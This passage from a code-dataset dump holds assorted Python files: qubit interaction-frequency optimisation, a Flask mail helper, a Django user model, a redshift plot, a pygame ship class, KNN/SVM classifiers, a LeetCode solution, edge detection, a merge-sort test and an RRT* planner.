max(step_time, 1 / (np.sqrt(8) * couplings[g]))\n for qn, k_anh, ef in zip(sorted(g, key=lambda qn: qubits[qn]['wq']),\n [0, 1], [False, True]):\n qubit_freqs[qn] = wints[g] - k_anh * qubits[qn]['anh']\n qubit_ef[qn] = ef\n for qn in inactive_qubits:\n specs = [\n (qubit_freqs[qn2], qubits[qn2]['anh'],\n couplings[frozenset({qn, qn2})], qubit_ef[qn2])\n for qn2 in qubits[qn]['neighbors']\n ]\n fidelities[qn] = \\\n calculate_idle_spec_fidelity(qubit_freqs[qn], qubits[qn]['anh'],\n specs, step_time)\n\n for g in wints:\n qn1, qn2 = sorted(g, key=lambda qn: qubits[qn]['wq'])\n specs1, specs2 = [\n [\n (qubit_freqs[qn3], qubits[qn3]['anh'],\n couplings[frozenset({qn, qn3})], qubit_ef[qn3])\n for qn3 in qubits[qn]['neighbors'] if qn3 not in g\n ] for qn in [qn1, qn2]\n ]\n fid = calculate_gate_spec_fidelity(wints[g], qubits[qn1]['anh'],\n qubits[qn2]['anh'],\n specs1, specs2, step_time)\n fidelities[qn1] = np.sqrt(fid)\n fidelities[qn2] = np.sqrt(fid)\n return fidelities\n\n\nclass InvalidParallelGatesError(Exception):\n \"\"\"Parallel gate interaction frequency finding problem has no solution\"\"\"\n pass\n\n\ndef find_interaction_frequencies(qubits, couplings, gates, method='optimize'):\n \"\"\"\n Find optimal interaction frequencies\n\n Args:\n qubits: dict[str, dict[str, any]]\n A dictionary from qubit names to properties. The following\n properties should be defined:\n neighbors: a set of qubit names that neighbor this qubit\n wq: qubit parking frequency\n anh: qubit anharmonicity (negative for transmon qubits)\n couplings: dict[frozenset[str], float]\n Qubit-qubit coupling rates. 
Keys are frozensets of coupled qubit\n            names and values are the 01-10 coupling rates.\n        gates: collection[frozenset[str]]\n            A collection of gates (frozenset of involved qubit names) that will\n            be executed in parallel.\n        method: str\n            Method for choosing the interaction frequencies. Valid options:\n                'equal_spacing': maximizes the minimal detuning from all\n                    spurious resonant interactions\n                'optimize': minimizes total residual interaction error\n    Returns: dict[frozenset[str], float]\n        For each gate (key), the optimal interaction frequency\n    \"\"\"\n    # connected subsets of qubits\n    not_assigned_to_group = {qn for g in gates for qn in g}\n    connected_groups = set()\n    while len(not_assigned_to_group) != 0:\n        # find a set of connected qubits (group)\n        to_visit = {(next(iter(not_assigned_to_group)), None)}\n        group = []  # all active qubits involved in the step and their neighbors\n        while len(to_visit) != 0:\n            qni, qn_from = to_visit.pop()\n            group.append((qni, qn_from))\n            for qnj in qubits[qni]['neighbors']:\n                if qnj in not_assigned_to_group and qnj != qn_from:\n                    # group holds (qubit, parent) tuples, so the cycle check must\n                    # compare against the qubit names, not the tuples themselves\n                    if any(qnj == qnk for qnk, _ in group):\n                        raise InvalidParallelGatesError(f'Cycle: {group}')\n                    to_visit.add((qnj, qni))\n        not_assigned_to_group -= {g[0] for g in group}\n        connected_groups.add(tuple(group))\n\n    # neighboring gate graphs\n    gate_graphs = []\n    inv_gate_graphs = []\n    for group in connected_groups:\n        unordered_gates = {tuple(sorted(g, key=lambda qn: qubits[qn]['wq'])) for\n                           g in group if frozenset(g) in gates}\n        unordered_connections = {frozenset(g) for g in group if\n                                 frozenset(g) not in gates and None not in g}\n        gate_graph = {}  # from low int. freq gates to high int. freq gates\n        inv_gate_graph = {}  # from high int. freq gates to low int. freq gates\n        for g in unordered_gates:\n            gate_graph[g] = set()\n            inv_gate_graph[g] = set()\n            for c in unordered_connections:\n                if g[0] in c:\n                    qn = [qn for qn in c if qn != g[0]][0]\n                    for g2 in unordered_gates:\n                        if g2[0] == qn:\n                            raise InvalidParallelGatesError(\n                                f'Opposing gate directions: {g}, {g2}')\n                        if g2[1] == qn:\n                            gate_graph[g].add(g2)\n                if g[1] in c:\n                    qn = [qn for qn in c if qn != g[1]][0]\n                    for g2 in unordered_gates:\n                        if g2[1] == qn:\n                            raise InvalidParallelGatesError(\n                                f'Opposing gate directions: {g}, {g2}')\n                        if g2[0] == qn:\n                            inv_gate_graph[g].add(g2)\n        gate_graphs.append(gate_graph)\n        inv_gate_graphs.append(inv_gate_graph)\n\n    # optimize each gate graph\n    gate_wints = {}\n    if method == 'equal_spacing':\n        # interactions to avoid:\n        # for high-freq int. qubits: 2x anh below (1x anh above)\n        # for low-freq int. 
qubits: 1x anh above (1x anh below)\n\n # strategy: start traversing gate graph from low to high, placing each\n # interaction frequency as low as possible and remember, how much\n # higher it could be placed, and in which layer this gate is\n # finally distribute the minimal slack equally\n for gate_graph, inv_gate_graph in zip(gate_graphs, inv_gate_graphs):\n layer = 0\n gate_layers_wints = {}\n next_gates = {g for g, conns in inv_gate_graph.items() if\n len(conns) == 0}\n while len(next_gates) != 0:\n new_next_gates = set()\n for g in next_gates:\n wintmin = qubits[g[0]]['wq']\n wintmax = qubits[g[1]]['wq'] + qubits[g[1]]['anh']\n # low qubit interactions with parked spectator qubits\n for qn in qubits[g[0]]['neighbors']:\n if qn != g[1]:\n wintmax = min(wintmax,\n qubits[qn]['wq'] + qubits[qn]['anh'])\n # high qubit interactions with parked spectator qubits\n for qn in qubits[g[1]]['neighbors']:\n if qn != g[0]:\n wintmin = max(wintmin,\n qubits[qn]['wq'] + qubits[g[1]][\n 'anh'])\n # interactions with neighboring gates\n for g2 in inv_gate_graph[g]:\n wintmin = max(wintmin,\n gate_layers_wints[g2][1] - qubits[g[1]][\n 'anh'])\n gate_layers_wints[g] = (layer, wintmin, wintmax)\n new_next_gates |= gate_graph[g]\n next_gates = new_next_gates\n layer += 1\n slack = min([(wintmax - wintmin) / (layer + 2) for\n g, (layer, wintmin, wintmax) in\n gate_layers_wints.items()])\n for g, (layer, wintmin, wintmax) in gate_layers_wints.items():\n gate_wints[frozenset(g)] = wintmin + (layer + 1) * slack\n elif method == 'optimize':\n gate_wints = find_interaction_frequencies(qubits, couplings, gates,\n method='equal_spacing')\n x0 = [gate_wints[g] for g in gates]\n\n def cost_func(x):\n fid = calculate_step_fidelity(qubits, couplings,\n dict(zip(gates, x)))\n return -np.sum(np.log([f for f in fid.values()]))\n\n x1 = sp.optimize.minimize(cost_func, x0).x\n x2 = sp.optimize.minimize(cost_func, x1).x\n gate_wints = dict(zip(gates, x2))\n else:\n raise ValueError(\n f\"Invalid method: {method}. 
Valid options are: \"\n \"['equal_spacing', 'optimize']\")\n return gate_wints\n","sub_path":"pycqed/simulations/interaction_frequencies.py","file_name":"interaction_frequencies.py","file_ext":"py","file_size_in_byte":16358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"168910752","text":"from threading import Thread\n\nfrom flask_mail import Message\n\nfrom app import app, mail\n\n\ndef send_async_email(msg):\n with app.app_context():\n mail.send(msg)\n\n\ndef send_email(subject, text_body):\n msg = Message(subject, recipients=['vpozhinskii@mail.ru'])\n msg.body = text_body\n thread = Thread(target=send_async_email, args=[msg])\n thread.start()","sub_path":"backend/app/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"49077887","text":"from django.contrib.auth.base_user import AbstractBaseUser\nfrom django.contrib.auth.models import PermissionsMixin, BaseUserManager\nfrom django.contrib.auth.validators import UnicodeUsernameValidator, ASCIIUsernameValidator\nfrom django.core.mail import send_mail\nfrom django.db import models\nfrom django.db import transaction\nfrom django.utils import six\nfrom django.utils import timezone\nfrom django.utils.translation import ugettext_lazy as _\nfrom phonenumber_field.modelfields import PhoneNumberField\nfrom taggit.managers import TaggableManager\n\nfrom account.constants import PHONE, USERNAME, EMAIL, GENDER, FIRST_NAME, LAST_NAME\nfrom account.signals import user_created\nfrom common.constants import OID\nfrom common.models import ObjectIdMixin\nfrom common.models import TagsMixin\nfrom helper.log import get_logger\n\nlogger = get_logger(__name__)\n\n\nclass UserManager(BaseUserManager):\n use_in_migrations = True\n\n @classmethod\n def normalize_phone(cls, phone):\n return phone.strip()\n\n @classmethod\n def normalize_email(cls, email):\n \"\"\"\n Normalize the email address by lowercasing the domain part of it.\n \"\"\"\n return super(UserManager, cls).normalize_email(email) or None\n\n def _create_user(self, password, phone=None, email=None, username=None, **extra_fields):\n \"\"\"\n Creates and saves a User with the given username, email and password.\n \"\"\"\n if not phone and not email:\n raise ValueError('The given phone or email must be set')\n create_data = {}\n if email:\n email = self.normalize_email(email)\n create_data[EMAIL] = email\n if phone:\n phone = self.normalize_phone(phone)\n create_data[PHONE] = phone\n if not username:\n username = phone or email\n username = self.model.normalize_username(username)\n create_data[USERNAME] = username\n oid = self.model.object_id_manager.generate_oid()\n create_data[OID] = oid\n extra_fields.update(create_data)\n with transaction.atomic():\n user = self.model(**extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n user_created.send(sender=User, user=user)\n return user\n\n def create_user(self, password, phone=None, email=None, **extra_fields):\n extra_fields.setdefault('is_staff', False)\n extra_fields.setdefault('is_superuser', False)\n return self._create_user(password, phone=phone, email=email, **extra_fields)\n\n def create_superuser(self, username, password, phone=None, email=None, **extra_fields):\n extra_fields.setdefault('is_staff', True)\n extra_fields.setdefault('is_superuser', True)\n\n if extra_fields.get('is_staff') is not True:\n raise ValueError('Superuser must have 
is_staff=True.')\n if extra_fields.get('is_superuser') is not True:\n raise ValueError('Superuser must have is_superuser=True.')\n\n return self._create_user(password, phone=phone, email=email, username=username, **extra_fields)\n\n\nclass User(AbstractBaseUser, ObjectIdMixin, PermissionsMixin, TagsMixin):\n\n UNKNOWN = 0\n MALE = 1\n FEMALE = 2\n\n GENDER_CHOICE = (\n (UNKNOWN, '未知'),\n (MALE, '男性'),\n (FEMALE, '女性'),\n )\n\n username_validator = UnicodeUsernameValidator() if six.PY3 else ASCIIUsernameValidator()\n\n username = models.CharField(\n _(USERNAME),\n max_length=150,\n unique=True,\n null=True,\n help_text=_('Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.'),\n validators=[username_validator],\n error_messages={\n 'unique': _(\"A user with that username already exists.\"),\n },\n )\n\n email = models.EmailField(\n _('email address'),\n blank=True,\n unique=True,\n null=True,\n default=None,\n error_messages={\n 'unique': _(\"A user with that email already exists.\"),\n },\n )\n\n phone = PhoneNumberField(\n _('telephone number'),\n blank=True,\n unique=True,\n null=True,\n error_messages={\n 'unique': _(\"A user with that telephone already exists.\"),\n },\n )\n\n first_name = models.CharField(_(FIRST_NAME), max_length=30, blank=True)\n last_name = models.CharField(_(LAST_NAME), max_length=30, blank=True)\n\n gender = models.PositiveSmallIntegerField(_(GENDER), choices=GENDER_CHOICE, default=UNKNOWN)\n\n is_staff = models.BooleanField(\n _('staff status'),\n default=False,\n help_text=_('Designates whether the user can log into this admin site.'),\n )\n is_active = models.BooleanField(\n _('active'),\n default=True,\n help_text=_(\n 'Designates whether this user should be treated as active. '\n 'Unselect this instead of deleting accounts.'\n ),\n )\n date_joined = models.DateTimeField(_('date joined'), default=timezone.now)\n\n objects = UserManager()\n\n USERNAME_FIELD = USERNAME\n REQUIRED_FIELDS = [EMAIL]\n\n class Meta:\n verbose_name = _('user')\n verbose_name_plural = _('users')\n swappable = 'AUTH_USER_MODEL'\n\n def get_full_name(self):\n \"\"\"\n Returns the first_name plus the last_name, with a space in between.\n \"\"\"\n full_name = '%s %s' % (self.first_name, self.last_name)\n return full_name.strip()\n\n def get_short_name(self):\n \"\"\"Returns the short name for the user.\"\"\"\n return self.first_name\n\n def email_user(self, subject, message, from_email=None, **kwargs):\n \"\"\"\n Sends an email to this User.\n \"\"\"\n send_mail(subject, message, from_email, [self.email], **kwargs)\n\n @property\n def full_name(self):\n return self.get_full_name()\n\n @property\n def short_name(self):\n return self.get_short_name()\n\n @property\n def salutation(self):\n if self.gender == self.MALE:\n return '先生'\n elif self.gender == self.FEMALE:\n return '女士 '\n return '客人'\n","sub_path":"src/apps/account/models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":6154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"391903987","text":"\"\"\"\nThis file will verify the cosmic time - redshift equation shown in https://arxiv.org/pdf/gr-qc/0506079.pdf \nby comparing it to the original equation in our in model\n\"\"\"\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef cosmoEq(t):\n W_M=0.308 #matter energy density parameter\n W_lambda=0.692 #dark energy density parameter\n H_0=0.0692 #Gyr⁻¹ - Hubble's constant\n return (((math.sinh(3*W_lambda**0.5*t / (2*1/H_0) ) * 
(W_lambda/W_M)**-0.5)**(-2/3)) -1)\n\ndef approx(t):\n    return (((28./(t))-1.)**(1./2.)-1.)\n\nts = np.linspace(0.051,14,1000000) # time in Gyr\nx = [cosmoEq(i) for i in ts]\ny = [approx(i) for i in ts]\n\nplt.plot(ts,x, color='red', label='Cosmology Equation')\nplt.plot(ts,y, color='blue', label='Approximation')\nplt.xlabel('Cosmic Time [Gyrs]')\nplt.ylabel('Redshift')\nplt.legend()\nplt.show()","sub_path":"Our Scripts/old stuff/redshiftEqns.py","file_name":"redshiftEqns.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"268333823","text":"import pygame\r\nimport math  # needed for math.pi in draw()\r\n\r\n# Ship class\r\nclass Ship:\r\n\r\n    def __init__(self, pos, vel, angle, image, info):\r\n        self.pos = [pos[0], pos[1]]\r\n        self.vel = [vel[0], vel[1]]\r\n        self.thrust = False\r\n        self.angle = angle\r\n        self.angle_vel = 0\r\n        self.image = image\r\n        self.image_center = info.get_center()\r\n        self.image_size = info.get_size()\r\n        self.radius = info.get_radius()\r\n    \r\n    def draw(self,screen):\r\n        if self.thrust:\r\n            # isolate the single ship thrust image and create a new surface from it\r\n            rot_image = self.image.subsurface((90, 0), (90, 90))\r\n        else:\r\n            # isolate the single ship image and create a new surface from it\r\n            rot_image = self.image.subsurface((0, 0), (90, 90))\r\n\r\n        rot_image = pygame.transform.scale(rot_image, self.image_size)\r\n        \r\n        orig_rect = rot_image.get_rect()\r\n        \r\n        # convert angle to radians\r\n        rot_image = pygame.transform.rotate(rot_image, - (180 * self.angle / math.pi))\r\n\r\n        # center the rectangle on the newly rotated image\r\n        rot_rect = orig_rect.copy()\r\n        rot_rect.center = rot_image.get_rect().center\r\n        rot_image = rot_image.subsurface(rot_rect).copy()\r\n\r\n        # adjust draw position due to drawing from top left corner and not center\r\n        screen.blit(rot_image, [self.pos[0] - self.image_center[0], self.pos[1] - self.image_center[1]], rot_image.get_rect())\r\n\r\n    def update(self):\r\n        # update angle\r\n        self.angle += self.angle_vel\r\n        \r\n        # update position\r\n        self.pos[0] = (self.pos[0] + self.vel[0]) % WIDTH\r\n        self.pos[1] = (self.pos[1] + self.vel[1]) % HEIGHT\r\n\r\n        # update velocity\r\n        if self.thrust:\r\n            acc = angle_to_vector(self.angle)\r\n            self.vel[0] += acc[0] * .1\r\n            self.vel[1] += acc[1] * .1\r\n        \r\n        self.vel[0] *= .99\r\n        self.vel[1] *= .99\r\n\r\n    def set_thrust(self, on):\r\n        self.thrust = on\r\n        if on:\r\n            ship_thrust_sound.stop()\r\n            ship_thrust_sound.play()\r\n        else:\r\n            ship_thrust_sound.stop()\r\n    \r\n    def increment_angle_vel(self):\r\n        self.angle_vel += .05\r\n    \r\n    def decrement_angle_vel(self):\r\n        self.angle_vel -= .05\r\n    \r\n    def shoot(self):\r\n        global missile_group\r\n        forward = angle_to_vector(self.angle)\r\n        missile_pos = [self.pos[0] + self.radius * forward[0], self.pos[1] + self.radius * forward[1]]\r\n        missile_vel = [self.vel[0] + 6 * forward[0], self.vel[1] + 6 * forward[1]]\r\n        a_missile = Sprite(missile_pos, missile_vel, self.angle, 0, missile_image, missile_info, missile_sound)\r\n        missile_group.add(a_missile)\r\n    \r\n    def get_pos(self):\r\n        return self.pos\r\n    \r\n    def get_radius(self):\r\n        return self.radius","sub_path":"ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"80946757","text":"from __future__ import print_function\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import 
classification_report\r\nfrom sklearn import datasets\r\nimport numpy as np\r\nimport cv2\r\nimport sklearn\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn import datasets, svm, metrics\r\nimport struct\r\nimport sys\r\n\r\n\r\n\r\n\r\ndef main():\r\n\r\n fast = False\r\n if(len(sys.argv) > 1 and sys.argv[1]=='fast'):\r\n print (\"running fast version\")\r\n fast = True\r\n\r\n print(\"IRIS DATA\")\r\n testData, testLabels, trainData, trainLabels, valData, valLabels = ExtructIris(fast)\r\n PerformKnn(testData, testLabels, trainData, trainLabels, valData, valLabels)\r\n PerformSvm(testData, testLabels, trainData, trainLabels, valData, valLabels)\r\n print(\"\\n\\n MNIST DATA\")\r\n testData, testLabels, trainData, trainLabels, valData, valLabels = ExtructMNIST(fast)\r\n PerformKnn(testData, testLabels, trainData, trainLabels, valData, valLabels)\r\n PerformSvm(testData, testLabels, trainData, trainLabels, valData, valLabels)\r\n\r\ndef ExtructIris(fast):\r\n iris = datasets.load_iris()\r\n trainData, trainLabels = iris.data ,iris.target\r\n (trainData, valData, trainLabels, valLabels) = train_test_split(trainData, trainLabels, test_size=0.1)\r\n (trainData, testData, trainLabels, testLabels) = train_test_split(trainData, trainLabels)\r\n return testData, testLabels, trainData, trainLabels, valData, valLabels\r\n\r\ndef ExtructMNIST(fast):\r\n trainData, trainLabels = loadlocal_mnist(images_path='train-images.idx3-ubyte',\r\n labels_path='train-labels.idx1-ubyte')\r\n testData, testLabels = loadlocal_mnist(images_path='t10k-images.idx3-ubyte', labels_path='t10k-labels.idx1-ubyte')\r\n if fast:\r\n # to make it fast we take only the 10% for the training\r\n (trainData, valData, trainLabels, valLabels) = train_test_split(trainData, trainLabels, test_size=0.9)\r\n # we take 10% of the training data and use that for validation\r\n (trainData, valData, trainLabels, valLabels) = train_test_split(trainData, trainLabels, test_size=0.1)\r\n return testData, testLabels, trainData, trainLabels, valData, valLabels\r\n\r\n\r\n\r\n\r\ndef PerformKnn(testData, testLabels, trainData, trainLabels, valData, valLabels):\r\n BestK = FindBestK(trainData, trainLabels, valData, valLabels)\r\n print(\"best K is %d\" % (BestK))\r\n # re-train our classifier using the best k value and predict the labels of the\r\n # test data\r\n model = KNeighborsClassifier(n_neighbors=BestK)\r\n model.fit(trainData, trainLabels)\r\n predictions = model.predict(testData)\r\n GetReports(model, predictions, testLabels)\r\n\r\n\r\ndef GetReports(model, predictions, testLabels):\r\n print(\"Classification report for classifier %s:\\n%s\"\r\n % (model, metrics.classification_report(testLabels, predictions)))\r\n print(\"Confusion matrix:\\n%s\" % metrics.confusion_matrix(testLabels, predictions))\r\n\r\n\r\ndef PerformSvm(testData, testLabels, trainData, trainLabels, valData, valLabels):\r\n BestC ,kernel = FindBestCAndKernel(trainData, trainLabels, valData, valLabels)\r\n print(\"best C is %f best kernel is %s\" % (BestC,kernel))\r\n # re-train our classifier using the best C and kernel values and predict the labels of the\r\n # test data\r\n model = svm.SVC(kernel=kernel, C=BestC)\r\n model.fit(trainData, trainLabels)\r\n predictions = model.predict(testData)\r\n GetReports(model, predictions, testLabels)\r\n\r\n\r\ndef FindBestK(trainData, trainLabels, valData, valLabels):\r\n print(\"FindBestK\")\r\n MaxScore = 0.0\r\n minK = 0\r\n # try different values of K for the best classification results\r\n for k in 
range(1, 15, 2):\r\n        model = KNeighborsClassifier(n_neighbors=k)\r\n        model.fit(trainData, trainLabels)\r\n        score = model.score(valData, valLabels)\r\n        print(\"k=\" ,k,\"score=\", score)\r\n        if MaxScore < score:\r\n            MaxScore = score\r\n            minK = k\r\n    return minK\r\n\r\ndef FindBestCAndKernel(trainData, trainLabels, valData, valLabels):\r\n    print(\"FindBestCAndKernel\")\r\n    MaxScore = 0.0\r\n    minC = 0\r\n    minKern = 'linear'\r\n    # try different values of C and kernel for the best classification results\r\n    for kern in ['linear','rbf','poly']:\r\n        for c in np.linspace(0.1,1,5):\r\n            model = svm.SVC(kernel=kern, C=c)\r\n            model.fit(trainData, trainLabels)\r\n            score = model.score(valData, valLabels)\r\n            print(\"C=\",c,\"kernel= \",kern,\"score=\", score)\r\n            if MaxScore < score:\r\n                MaxScore = score\r\n                minC = c\r\n                minKern = kern\r\n    return minC , minKern\r\n\r\ndef loadlocal_mnist(images_path, labels_path):\r\n    with open(labels_path, 'rb') as lbpath:\r\n        magic, n = struct.unpack('>II',\r\n                                 lbpath.read(8))\r\n        labels = np.fromfile(lbpath,\r\n                             dtype=np.uint8)\r\n    with open(images_path, 'rb') as imgpath:\r\n        magic, num, rows, cols = struct.unpack(\">IIII\",\r\n                                               imgpath.read(16))\r\n        images = np.fromfile(imgpath,\r\n                             dtype=np.uint8).reshape(len(labels), 784)\r\n    return images, labels\r\n\r\nmain()","sub_path":"MAMAN12.py","file_name":"MAMAN12.py","file_ext":"py","file_size_in_byte":5268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"394786869","text":"\n#629. K Inverse Pairs Array \n\ndef kInvPairs(n, k):\n    if (n == 1): \n        return [[1]] if (k == 0) else []\n    \n    result = []\n    for i in range(k+1):\n        r = kInvPairs(n-1, i)\n        for x in r:\n            l = list(x)\n            if (len(x) >= (k-i)):\n                l.insert(len(x)-k+i, n) \n                result.append(l) \n    \n    return result\n    \ndef numPairs(n):\n    return n*(n-1)//2\n    \ns = 0 \nn = 6\nnn = numPairs(n) \nfor i in range(nn+1):\n    pp = kInvPairs(n, i)\n    print(\"{0}:{1}:{2}\".format(i, len(pp), pp)) \n    s += len(pp)\nprint(\"sum of all is {0}\".format(s)) ","sub_path":"Leetcode/629.py","file_name":"629.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"481358218","text":"from PIL import Image, ImageFilter\nimport numpy as np\nimport glob\nfrom numpy import array\nimport matplotlib.pyplot as plt\nfrom skimage import morphology\nimport scipy.ndimage\nimport scipy.misc  # scipy.misc.imsave is used below and must be imported explicitly\n\ndef sample_stack(stack, rows=2, cols=2, start_with=0, show_every=1, display1 = True):\n    if (display1):\n        new_list = []\n        new_list.append(stack)\n        new_list.append(stack)\n        new_list.append(stack)\n        new_list.append(stack)\n        sample_stack(new_list, 2, 2, 0, 1, False)\n    else:\n        fig,ax = plt.subplots(rows,cols,figsize=[12,12])\n        for i in range((rows*cols)):\n            ind = start_with + i*show_every\n            ax[int(i/rows),int(i % rows)].set_title('slice %d' % ind)\n            ax[int(i/rows),int(i % rows)].imshow(stack[ind],cmap='gray')\n            ax[int(i/rows),int(i % rows)].axis('off')\n        plt.show()\n\"\"\"\ndatapath = \"jpg_images/\"\nimg0 = Image.open(\"jpg_images/maskedimage\" + str(0) + \".jpg\")\ncounter = 0\nimg1 = []\nfor f in glob.glob('/Users/paulmccabe/Desktop/jpg images/*.jpg'):\n    path = \"jpg_images/maskedimage\" + str(counter) + \".jpg\"\n    img0 = Image.open(path).convert('L')\n    img1.append(array(img0))\n    counter += 1\nprint(\"Counter: \" + str(counter))\nimgs_to_process_orig = np.stack([s for s in img1])\n\"\"\"\nid = 2\n\nimgs = np.load(\"/Users/paulmccabe/Desktop/Segmentation Project/\" + \"justmask_%d.npy\" % 
(id))\ncounter = 0\nprint(\"Saving as jpg Images...\")\nfor img in imgs:\n scipy.misc.imsave('/Users/paulmccabe/Desktop/Segmentation Project' + '/jpg mask images/justmask{}.jpg'.format(counter), img)\n counter += 1\ncounter = 0\n#print(\"Re-Importing jpg Images...\")\n#for f in glob.glob('/Users/paulmccabe/Desktop/Segmentation Project/jpg mask images/*.jpg'):\n# path = \"jpg_images/maskedimage\" + str(counter) + \".jpg\"\n# img0 = Image.open(path).convert('L')\n# img1.append(array(img0))\n# counter += 1\nimgs[imgs == 1] = 255\nlist = []\nfor img in imgs:\n PIL_img = Image.fromarray(img.astype('uint8'))\n PIL_edge = PIL_img.filter(ImageFilter.FIND_EDGES)\n np_img = array(PIL_edge)\n dilation = morphology.dilation(np_img, np.ones([4,4]))\n list.append(dilation)\n\nimgs_after_processing = np.stack([s for s in list])\n\nnp.save(\"/Users/paulmccabe/Desktop/Segmentation Project\" + \"/justedge_%d.npy\" % (id), imgs_after_processing[:284])\n\n#sample_stack(np_img)","sub_path":"Edge Detection.py","file_name":"Edge Detection.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"456267506","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\nimport random\nimport unittest\nfrom lab2 import merge_sort, CustomRange\n\n__author__ = 'asaskevich'\n\n\nclass TestCase(unittest.TestCase):\n def test_sort(self):\n fname = 'd:/Work/JetBrains/PyCharm/lab_2/content/test_case.txt'\n chunk = 10\n n = 10 * chunk\n with open(fname, 'w') as f:\n f.writelines('{}\\n'.format(random.randint(-1000000, 1000000)) for _ in range(n))\n\n merge_sort(fname, chunk)\n\n with open(fname) as f:\n nums = [int(x) for x in f.readlines()]\n for i in CustomRange(len(nums) - 1):\n self.assertLessEqual(nums[i], nums[i + 1])\n","sub_path":"kurs_3/sem_1/IGI/lb/Laboratornaya_2/Лабораторная 2/tests/test_merge_sort.py","file_name":"test_merge_sort.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"597781680","text":"from operator import itemgetter\nfrom randomtree_struct import RandomTreeStruct\nimport math\n\ndef dist_between_points(a, b):\n\n #Return the Euclidean distance between two points\n\n distance = sum(map(lambda a_b: (a_b[0] - a_b[1]) ** 2, zip(a, b)))\n\n return math.sqrt(distance)\n\ndef cost_to_go(a: tuple, b: tuple) -> float:\n \"\"\"\n #return: estimated segment_cost-to-go from a to b\n \"\"\"\n return dist_between_points(a, b)\n\n\ndef path_cost(E, a, b):\n \"\"\"\n #Cost of the unique path from x_init to x\n #return: segment_cost of unique path from x_init to x\n \"\"\"\n cost = 0\n while not b == a:\n p = E[b]\n cost += dist_between_points(b, p)\n b = p\n\n return cost\n\n\ndef segment_cost(a, b):\n #return: segment_cost function between a and b\n\n return dist_between_points(a, b)\n\n\nclass RRTStar(RandomTreeStruct):\n def __init__(self, X, Q, x_init, x_goal, max_samples, r, prc=0.01, rewire_count=None):\n \"\"\"\n RRT* Search\n X: Search Space\n Q: list of lengths of edges added to tree\n x_init: tuple, initial location\n x_goal: tuple, goal location\n max_samples: max number of samples to take\n r: resolution of points to sample along edge when checking for collisions\n prc: probability of checking whether there is a solution\n rewire_count: number of nearby vertices to rewire\n \"\"\"\n super().__init__(X, Q, x_init, x_goal, max_samples, r, prc)\n self.rewire_count = rewire_count if rewire_count is not None else 0\n self.c_best 
= float('inf')  # length of best solution thus far\n\n    def get_nearby_vertices(self, tree, x_init, x_new):\n        \"\"\"\n        Get nearby vertices to new vertex and their associated path costs from the root of tree\n        as if new vertex is connected to each one separately.\n        return: list of nearby vertices and their costs, sorted in ascending order by cost\n        \"\"\"\n        X_near = self.nearby(tree, x_new, self.current_rewire_count(tree))\n        L_near = [(path_cost(self.trees[tree].E, x_init, x_near) + segment_cost(x_near, x_new), x_near) for\n                  x_near in X_near]\n        # noinspection PyTypeChecker\n        L_near.sort(key=itemgetter(0))\n\n        return L_near\n\n    def rewire(self, tree, x_new, L_near):\n        \"\"\"\n        Rewire tree to shorten edges if possible\n        Only rewires vertices according to rewire count\n        \"\"\"\n        for c_near, x_near in L_near:\n            curr_cost = path_cost(self.trees[tree].E, self.x_init, x_near)\n            tent_cost = path_cost(self.trees[tree].E, self.x_init, x_new) + segment_cost(x_new, x_near)\n            if tent_cost < curr_cost and self.X.collision_free(x_near, x_new, self.r):\n                # reconnect x_near through x_new (a stray debug break previously made this line unreachable)\n                self.trees[tree].E[x_near] = x_new\n\n    def connect_shortest_valid(self, tree, x_new, L_near):\n        \"\"\"\n        Connect to nearest vertex that has an unobstructed path\n        \"\"\"\n        # check nearby vertices for total cost and connect shortest valid edge\n        for c_near, x_near in L_near:\n            if c_near + cost_to_go(x_near, self.x_goal) < self.c_best and self.connect_to_point(tree, x_near, x_new):\n                break\n\n    def current_rewire_count(self, tree):\n        \"\"\"\n        Return rewire count\n\n        \"\"\"\n        # if no rewire count specified, set rewire count to be all vertices\n        if self.rewire_count is None:\n            return self.trees[tree].V_count\n\n        # max valid rewire count\n        return min(self.trees[tree].V_count, self.rewire_count)\n\n    def rrt_star(self,copter_size):\n        \"\"\"\n        :return: set of Vertices; Edges in form: vertex: [neighbor_1, neighbor_2, ...]\n        \"\"\"\n        self.add_vertex(0, self.x_init)\n        self.add_edge(0, self.x_init, None)\n        x_new=self.x_init\n        while True:\n            for q in self.Q:  # iterate over different edge lengths\n                for i in range(q[1]):  # iterate over number of edges of given length to add\n                    x_new, x_nearest = self.new_and_near(0,x_new,copter_size)\n                    if x_new is None:\n                        continue\n\n                    # get nearby vertices and cost-to-come\n                    L_near = self.get_nearby_vertices(0, self.x_init, x_new)\n\n                    # check nearby vertices for total cost and connect shortest valid edge\n                    self.connect_shortest_valid(0, x_new, L_near)\n                    #if x_new in self.trees[0].E:\n                    #rewire tree\n\n                    #self.rewire(0, x_new, L_near)\n\n                    solution = self.check_solution()\n                    if solution[0]:\n                        return solution[1]\n","sub_path":"Phase2/rrt_star.py","file_name":"rrt_star.py","file_ext":"py","file_size_in_byte":4837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} 